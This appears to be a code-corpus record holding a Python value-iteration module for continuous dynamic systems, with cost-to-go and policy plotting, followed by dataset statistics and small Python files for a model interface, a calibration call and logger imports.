for j in range(self.grid_sys.xgriddim[1]):
if self.J[i,j] >= maxJ :
self.Jplot[i,j] = maxJ
else:
self.Jplot[i,j] = self.J[i,j]
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Cost-to-go')
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = self.fontsize)
plt.xlabel(xname, fontsize = self.fontsize)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.Jplot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0],
self.sys.x_ub[0],
self.sys.x_lb[1],
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def plot_policy(self, i = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
policy_plot = self.u_policy_grid[i].copy()
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Policy for u[%i]'%i)
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = self.fontsize )
plt.xlabel(xname, fontsize = self.fontsize )
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
policy_plot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0],
self.sys.x_ub[0],
self.sys.x_lb[1],
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def load_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
try:
self.J = np.load( name + '_J' + '.npy' )
self.action_policy = np.load( name + '_a' + '.npy' ).astype(int)
except Exception:
print('Failed to load DP data')
################################
def save_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
np.save( name + '_J' , self.J )
np.save( name + '_a' , self.action_policy.astype(int))
'''
################################################################################
'''
class ValueIteration_3D( ValueIteration_2D ):
""" Dynamic programming for 3D continous dynamic system, 2 continuous input u """
############################
def __init__(self, grid_sys , cost_function ):
# Dynamic system
self.grid_sys = grid_sys # Discretized Dynamic system class
self.sys = grid_sys.sys # Base Dynamic system class
# Controller
self.ctl = ViController( self.sys.n , self.sys.m , self.sys.n)
# Cost function
self.cf = cost_function
# Options
self.uselookuptable = False
##############################
def initialize(self):
""" initialize cost-to-go and policy """
self.J = np.zeros( self.grid_sys.xgriddim , dtype = float )
self.J_1D = np.zeros( self.grid_sys.nodes_n , dtype = float )
self.action_policy = np.zeros( self.grid_sys.xgriddim , dtype = int )
self.Jnew = self.J.copy()
self.J_1D_new = self.J_1D.copy()
self.Jplot = self.J.copy()
# Initial evaluation
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# Final Cost
J0 = self.cf.h( x )  # use a fresh name: 'j' already holds a grid index
self.J[i,j,k] = J0
self.J_1D[node] = J0
###############################
def compute_step(self):
""" One step of value iteration """
# Get interpolation of current cost space
#J_interpol = interpol2D( self.grid_sys.xd[0] , self.grid_sys.xd[1] , self.J , bbox=[None, None, None, None], kx=1, ky=1,)
cartcoord = self.grid_sys.nodes_state
values = self.J_1D
J_interpol = LinearNDInterpolator(cartcoord, values, fill_value=0)
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# One-step costs - Q values
Q = np.zeros( self.grid_sys.actions_n )
# For all control actions
for action in range( self.grid_sys.actions_n ):
u = self.grid_sys.actions_input[ action , : ]
# Compute next state and validity of the action
x_next = self.sys.f( x , u ) * self.grid_sys.dt + x
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
action_isok = ( u_ok & x_ok )
# If the current option is allowable
if action_isok:
J_next = J_interpol( x_next )
# Cost-to-go of a given action
Q[action] = self.cf.g( x , u ) + J_next[0] # LinearNDInterpolator returns a length-1 array
else:
# Not allowable states or inputs/states combinations
Q[action] = self.cf.INF
self.Jnew[i,j,k] = Q.min()
self.J_1D_new[node] = self.Jnew[i,j,k]
self.action_policy[i,j,k] = Q.argmin()
# Impossible situation (unacceptable for any control action)
if self.Jnew[i,j,k] > (self.cf.INF-1) :
self.action_policy[i,j,k] = -1
# Convergence check
delta = self.J - self.Jnew
j_max = self.Jnew.max()
delta_max = delta.max()
delta_min = delta.min()
print('Max:',j_max,'Delta max:',delta_max, 'Delta min:',delta_min)
self.J = self.Jnew.copy()
self.J_1D = self.J_1D_new.copy()
################################
def assign_interpol_controller(self):
""" controller from optimal actions """
# Compute grid of u
self.u_policy_grid = []
self.u_policy_1D = []
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid.append( np.zeros( self.grid_sys.xgriddim , dtype = float ) )
self.u_policy_1D.append( np.zeros( self.grid_sys.nodes_n , dtype = float ) )
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# If no action is good
if ( self.action_policy[i,j,k] == -1 ):
# for all inputs ('l' avoids clobbering the state index 'k')
for l in range(self.sys.m):
self.u_policy_grid[l][i,j,k] = 0
self.u_policy_1D[l][node] = 0
else:
# for all inputs
for l in range(self.sys.m):
self.u_policy_grid[l][i,j,k] = self.grid_sys.actions_input[ self.action_policy[i,j,k] , l ]
self.u_policy_1D[l][node] = self.grid_sys.actions_input[ self.action_policy[i,j,k] , l ]
# Compute Interpol function
self.x2u_interpol_functions = []
cartcoord = self.grid_sys.nodes_state
# for all inputs
for k in range(self.sys.m):
values = self.u_policy_1D[k]
self.x2u_interpol_functions.append(
LinearNDInterpolator(cartcoord, values, fill_value=0)
)
# Assign controller
self.ctl.vi_law = self.vi_law
################################
def vi_law(self, x , t = 0 ):
""" controller from optimal actions """
u = np.zeros( self.sys.m )
# for all inputs
for k in range(self.sys.m):
u[k] = self.x2u_interpol_functions[k]( x )[0] # interpolator returns a length-1 array
return u
################################
def plot_cost2go(self, k = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
self.Jplot = self.J[:,:,k].copy()
###################
fs = 10
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Cost-to-go')
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = fs)
plt.xlabel(xname, fontsize = fs)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.Jplot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0] ,
self.sys.x_ub[0],
self.sys.x_lb[1] ,
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def plot_policy_ij(self, k = 0 , ui = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
policy_plot = self.u_policy_grid[ui][:,:,k].copy()
###################
fs = 10
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Policy for u[%i]'%ui)
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = fs)
plt.xlabel(xname, fontsize = fs)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] , self.grid_sys.xd[1] , policy_plot.T )
plt.axis([self.sys.x_lb[0] , self.sys.x_ub[0], self.sys.x_lb[1] , self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def load_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
try:
self.J = np.load( name + '_J' + '.npy' )
self.action_policy = np.load( name + '_a' + '.npy' ).astype(int)
self.J_1D = np.zeros( self.grid_sys.nodes_n , dtype = float )
self.Jnew = self.J.copy()
self.J_1D_new = self.J_1D.copy()
self.Jplot = self.J.copy()
# Create 1D J
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
self.J_1D[node] = self.J[i,j,k]
except Exception:
print('Failed to load DP data')
| 34.536977 | 130 | 0.43469 | 2,368 | 21,482 | 3.79603 | 0.099662 | 0.059962 | 0.089331 | 0.062298 | 0.846257 | 0.819668 | 0.789076 | 0.782401 | 0.767716 | 0.755479 | 0 | 0.017336 | 0.425379 | 21,482 | 622 | 131 | 34.536977 | 0.710872 | 0.12848 | 0 | 0.683673 | 0 | 0 | 0.014485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.020408 | 0 | 0.115646 | 0.017007 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c68b4a596b5cfe993c2dc872011ab10261215435 | 177 | py | Python | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 1 | 2020-10-08T11:14:48.000Z | 2020-10-08T11:14:48.000Z | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 5 | 2020-03-24T18:01:02.000Z | 2022-03-12T00:17:24.000Z | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 1 | 2021-11-29T10:31:28.000Z | 2021-11-29T10:31:28.000Z | class IModel(object):
def predict(self, input, do_pre_proc):
raise NotImplementedError
def do_task(self, input, do_pre_proc):
raise NotImplementedError
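A minimal sketch of how a concrete class might satisfy this interface. The `IModel` definition is restated so the snippet is self-contained, and `DoublingModel` with its toy pre-processing is purely hypothetical, not part of DLBio:

```python
class IModel(object):
    def predict(self, input, do_pre_proc):
        raise NotImplementedError

    def do_task(self, input, do_pre_proc):
        raise NotImplementedError


class DoublingModel(IModel):
    """Hypothetical concrete model: doubles values when pre-processing is on."""

    def predict(self, input, do_pre_proc):
        # toy 'pre-processing': double each value first
        return [2 * v for v in input] if do_pre_proc else list(input)

    def do_task(self, input, do_pre_proc):
        # the 'task' here is just summing the predictions
        return sum(self.predict(input, do_pre_proc))


model = DoublingModel()
print(model.predict([1, 2, 3], do_pre_proc=True))
print(model.do_task([1, 2, 3], do_pre_proc=False))
```

Callers can then depend only on the `IModel` interface and swap implementations freely.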
| 25.285714 | 42 | 0.706215 | 22 | 177 | 5.454545 | 0.590909 | 0.15 | 0.183333 | 0.233333 | 0.7 | 0.7 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.220339 | 177 | 6 | 43 | 29.5 | 0.869565 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
c6a5194ec0abb6ee98692666d66a79801d206663 | 79 | py | Python | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | 1 | 2019-10-04T02:03:25.000Z | 2019-10-04T02:03:25.000Z | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | 3 | 2019-08-17T20:33:23.000Z | 2021-08-18T17:55:10.000Z | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | null | null | null | from cdips.utils.lcutils import make_calibration_list
make_calibration_list()
| 19.75 | 53 | 0.873418 | 11 | 79 | 5.909091 | 0.727273 | 0.461538 | 0.584615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075949 | 79 | 3 | 54 | 26.333333 | 0.890411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6ad735c80bc21f5ef159d9fbc9955035293f38c | 206 | py | Python | theseus/utilities/loggers/__init__.py | kaylode/Custom-Template | b2f11bfacf2b03b793476a19781f9046fab6fd82 | [
"MIT"
] | 2 | 2022-02-18T04:41:29.000Z | 2022-03-12T09:04:14.000Z | theseus/utilities/loggers/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 8 | 2022-02-16T17:01:28.000Z | 2022-03-28T02:53:45.000Z | theseus/utilities/loggers/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 3 | 2022-02-13T05:00:13.000Z | 2022-03-02T00:11:27.000Z | from .observer import LoggerObserver
from .tsb_logger import TensorboardLogger
from .image_writer import ImageWriter
from .stdout_logger import StdoutLogger, FileLogger
from .wandb_logger import WandbLogger | 41.2 | 51 | 0.873786 | 25 | 206 | 7.04 | 0.6 | 0.204545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097087 | 206 | 5 | 52 | 41.2 | 0.946237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |